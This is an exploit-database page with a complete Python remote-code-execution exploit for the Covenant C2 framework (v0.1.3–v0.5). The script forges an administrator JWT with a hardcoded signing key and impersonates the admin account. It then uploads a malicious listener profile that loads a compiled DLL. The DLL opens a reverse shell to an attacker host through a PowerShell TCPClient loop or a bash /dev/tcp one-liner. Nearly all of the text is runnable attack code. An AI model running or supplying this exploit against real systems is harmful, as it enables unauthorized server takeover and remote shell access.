Share
## https://sploitus.com/exploit?id=PACKETSTORM:171590
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)  
# Exploit Author: xThaz  
# Author website: https://xthaz.fr/  
# Date: 2022-09-11  
# Vendor Homepage: https://cobbr.io/Covenant.html  
# Software Link: https://github.com/cobbr/Covenant  
# Version: v0.1.3 - v0.5  
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker  
  
# Vulnerability  
## Discoverer: coastal  
## Date: 2020-07-13  
## Discoverer website: https://blog.null.farm  
## References:  
## - https://blog.null.farm/hunting-the-hunters  
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb  
  
# !/usr/bin/env python3  
# encoding: utf-8  
  
  
import jwt # pip3 install PyJWT  
import json  
import warnings  
import base64  
import re  
import random  
import argparse  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome  
from Crypto.Util.Padding import pad  
from Crypto.Cipher import AES  
from requests import request # pip3 install requests  
from subprocess import run  
from pwn import remote, context # pip3 install pwntools  
from os import remove, urandom  
from shutil import which  
from urllib.parse import urlparse  
from pathlib import Path  
from time import time  
  
  
def check_requirements():  
if which("mcs") is None:  
print("Please install the mono framework in order to compile the payload.")  
print("https://www.mono-project.com/download/stable/")  
exit(-1)  
  
  
def random_hex(length):  
alphabet = "0123456789abcdef"  
return ''.join(random.choice(alphabet) for _ in range(length))  
  
  
def request_api(method, token, route, body=""):  
warnings.simplefilter('ignore', InsecureRequestWarning)  
  
return request(  
method,  
f"{args.target}/api/{route}",  
json=body,  
headers={  
"Authorization": f"Bearer {token}",  
"Content-Type": "application/json"  
},  
verify=False  
)  
  
  
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):  
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'  
  
payload_data = {  
"sub": username,  
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",  
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,  
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [  
"User",  
"Administrator"  
],  
"exp": int(time()) + 360,  
"iss": "Covenant",  
"aud": "Covenant"  
}  
  
token = jwt.encode(payload_data, secret_key, algorithm='HS256')  
return token  
  
  
def get_id_admin(token, json_roles):  
id_admin = ""  
for role in json_roles:  
if role["name"] == "Administrator":  
id_admin = role["id"]  
print(f"\t[*] Found the admin group id : {id_admin}")  
break  
else:  
print("\t[!] Did not found admin group id, quitting !")  
exit(-1)  
  
id_admin_user = ""  
json_users_roles = request_api("get", token, f"users/roles").json()  
for user_role in json_users_roles:  
if user_role["roleId"] == id_admin:  
id_admin_user = user_role["userId"]  
print(f"\t[*] Found the admin user id : {id_admin_user}")  
break  
else:   
print("\t[!] Did not found admin id, quitting !")  
exit(-1)  
  
json_users = request_api("get", token, f"users").json()  
for user in json_users:  
if user["id"] == id_admin_user:  
username_admin = user["userName"]  
print(f"\t[*] Found the admin username : {username_admin}")  
return username_admin, id_admin_user  
else:   
print("\t[!] Did not found admin username, quitting !")  
exit(-1)  
  
  
def compile_payload():  
if args.os == "windows":  
payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'  
else:  
payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'  
  
dll = """using System;  
using System.Reflection;  
  
namespace ExampleDLL{  
public class Class1{  
public Class1(){  
}  
  
public void Main(string[] args){  
System.Diagnostics.Process.Start(""" + payload + """);  
}  
}  
}  
"""  
  
temp_dll_path = f"/tmp/{random_hex(8)}"  
Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())  
print(f"\t[*] Writing payload in {temp_dll_path}.cs")  
  
compilo_path = which("mcs")  
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])  
if compilation.returncode:  
print("\t[!] Error when compiling DLL, quitting !")  
exit(-1)  
print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")  
  
dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()  
  
remove(temp_dll_path + ".cs")  
remove(temp_dll_path + ".dll")  
print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")  
return dll_encoded  
  
  
def generate_wrapper(dll_encoded):  
wrapper = """public static class MessageTransform {  
public static string Transform(byte[] bytes) {  
try {  
string assemblyBase64 = \"""" + dll_encoded + """\";  
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);  
var assembly = System.Reflection.Assembly.Load(assemblyBytes);  
foreach (var type in assembly.GetTypes()) {  
object instance = System.Activator.CreateInstance(type);  
object[] args = new object[] { new string[] { \"\" } };  
try {  
type.GetMethod(\"Main\").Invoke(instance, args);  
}  
catch {}  
}  
}  
catch {}  
return System.Convert.ToBase64String(bytes);  
}  
  
public static byte[] Invert(string str) {  
return System.Convert.FromBase64String(str);  
}  
}"""  
  
return wrapper  
  
  
def upload_profile(token, wrapper):  
body = {  
'httpUrls': [  
'/en-us/index.html',  
'/en-us/docs.html',  
'/en-us/test.html'  
],  
'httpRequestHeaders': [  
{'name': 'User-Agent',  
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '  
'Safari/537.36'},  
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}  
],  
'httpResponseHeaders': [  
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}  
],  
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',  
'httpGetResponse': '{DATA}',  
'httpPostResponse': '{DATA}',  
'id': 0,  
'name': random_hex(8),  
'description': '',  
'type': 'HTTP',  
'messageTransform': wrapper  
}  
  
response = request_api("post", token, "profiles/http", body)  
  
if not response.ok:  
print("\t[!] Failed to create the listener profile, quitting !")  
exit(-1)  
else:  
profile_id = response.json().get('id')  
print(f"\t[*] Profile created with id {profile_id}")  
print("\t[*] Successfully created the listener profile")  
return profile_id  
  
  
def generate_valid_listener_port(impersonate_token, tries=0):  
if tries >= 10:  
print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")  
exit(-1)  
  
port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT  
listeners = request_api("get", impersonate_token, "listeners").json()  
  
port_used = []  
for listener in listeners:  
port_used.append(listener["bindPort"])  
  
if port in port_used:  
print(f"\t[!] Port {port} is already taken by another listener, retrying !")  
generate_valid_listener_port(impersonate_token, tries + 1)  
else:  
print(f"\t[*] Port {port} seems free")  
return port  
  
  
def get_id_listener_type(impersonate_token, listener_name):  
response = request_api("get", impersonate_token, "listeners/types")  
if not response.ok:  
print("\t[!] Failed to get the listener type, quitting !")  
exit(-1)  
else:  
for listener_type in response.json():  
if listener_type["name"] == listener_name:  
print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')  
return listener_type["id"]  
  
  
def generate_listener(impersonate_token, profile_id):  
listener_port = generate_valid_listener_port(impersonate_token)  
listener_name = random_hex(8)  
data = {  
'useSSL': False,  
'urls': [  
f"http://0.0.0.0:{listener_port}"  
],  
'id': 0,  
'name': listener_name,  
'bindAddress': "0.0.0.0",  
'bindPort': listener_port,  
'connectAddresses': [  
"0.0.0.0"  
],  
'connectPort': listener_port,  
'profileId': profile_id,  
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),  
'status': 'Active'  
}  
  
response = request_api("post", impersonate_token, "listeners/http", data)  
  
if not response.ok:  
print("\t[!] Failed to create the listener, quitting !")  
exit(-1)  
else:  
print("\t[*] Successfully created the listener")  
listener_id = response.json().get("id")  
return listener_id, listener_port  
  
  
def create_grunt(impersonate_token, data):  
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]  
if stager_code == "":  
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]  
if stager_code == "":  
print("\t[!] Failed to create the grunt payload, quitting !")  
exit(-1)  
  
print("\t[*] Successfully created the grunt payload")  
return stager_code  
  
  
def get_grunt_config(impersonate_token, listener_id):  
data = {  
'id': 0,  
'listenerId': listener_id,  
'implantTemplateId': 1,  
'name': 'Binary',  
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',  
'type': 'binary',  
'dotNetVersion': 'Net35',  
'runtimeIdentifier': 'win_x64',  
'validateCert': True,  
'useCertPinning': True,  
'smbPipeName': 'string',  
'delay': 0,  
'jitterPercent': 0,  
'connectAttempts': 0,  
'launcherString': 'GruntHTTP.exe',  
'outputKind': 'consoleApplication',  
'compressStager': False  
}  
  
stager_code = create_grunt(impersonate_token, data)  
aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)  
guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)  
if not aes_key or not guid_prefix:  
print("\t[!] Failed to retrieve the grunt configuration, quitting !")  
exit(-1)  
  
aes_key = aes_key.group(1)  
guid_prefix = guid_prefix.group(1)  
print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")  
return aes_key, guid_prefix  
  
  
def aes256_cbc_encrypt(key, message):  
iv_bytes = urandom(16)  
key_decoded = base64.b64decode(key)  
encoded_message = pad(message.encode(), 16)  
  
cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)  
encrypted = cipher.encrypt(encoded_message)  
  
hmac = HMAC.new(key_decoded, digestmod=SHA256)  
signature = hmac.update(encrypted).digest()  
  
return encrypted, iv_bytes, signature  
  
  
def trigger_exploit(listener_port, aes_key, guid):  
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"  
  
ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)  
data = {  
"GUID": guid,  
"Type": 0,  
"Meta": '',  
"IV": base64.b64encode(iv).decode(),  
"EncryptedMessage": base64.b64encode(ciphered).decode(),  
"HMAC": base64.b64encode(signature).decode()  
}  
  
json_data = json.dumps(data).encode("utf-8")  
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"  
  
if send_exploit(listener_port, "Cookie", guid, payload):  
print("\t[*] Exploit succeeded, check listener")  
else :  
print("\t[!] Exploit failed, retrying")  
if send_exploit(listener_port, "Cookies", guid, payload):  
print("\t[*] Exploit succeeded, check listener")  
else:  
print("\t[!] Exploit failed, quitting")  
  
  
def send_exploit(listener_port, header_cookie, guid, payload):  
context.log_level = 'error'  
  
request = f"""POST /en-us/test.html HTTP/1.1\r  
Host: {IP_TARGET}:{listener_port}\r  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r  
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r  
Content-Type: application/x-www-form-urlencoded\r  
Content-Length: {len(payload)}\r  
\r  
{payload}  
""".encode()  
  
sock = remote(IP_TARGET, listener_port)  
sock.sendline(request)  
response = sock.recv().decode()  
sock.close()  
  
if "HTTP/1.1 200 OK" in response:  
return True  
else:  
return False  
  
if __name__ == "__main__":  
check_requirements()  
  
parser = argparse.ArgumentParser()  
parser.add_argument("target",  
help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")  
parser.add_argument("os",  
help="Operating System of the target",  
choices=["windows", "linux"])  
parser.add_argument("lhost",  
help="IP of the machine that will receive the reverse shell")  
parser.add_argument("lport",  
help="Port of the machine that will receive the reverse shell")  
args = parser.parse_args()  
  
IP_TARGET = urlparse(args.target).hostname  
  
print("[*] Getting the admin info")  
sacrificial_token = craft_jwt("xThaz")  
roles = request_api("get", sacrificial_token, "roles").json()  
admin_username, admin_id = get_id_admin(sacrificial_token, roles)  
impersonate_token = craft_jwt(admin_username, admin_id)  
print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")  
  
print("[*] Generating payload")  
dll_encoded = compile_payload()  
wrapper = generate_wrapper(dll_encoded)  
print("[*] Uploading malicious listener profile")  
profile_id = upload_profile(impersonate_token, wrapper)  
  
print("[*] Generating listener")  
listener_id, listener_port = generate_listener(impersonate_token, profile_id)  
  
print("[*] Triggering the exploit")  
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)  
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")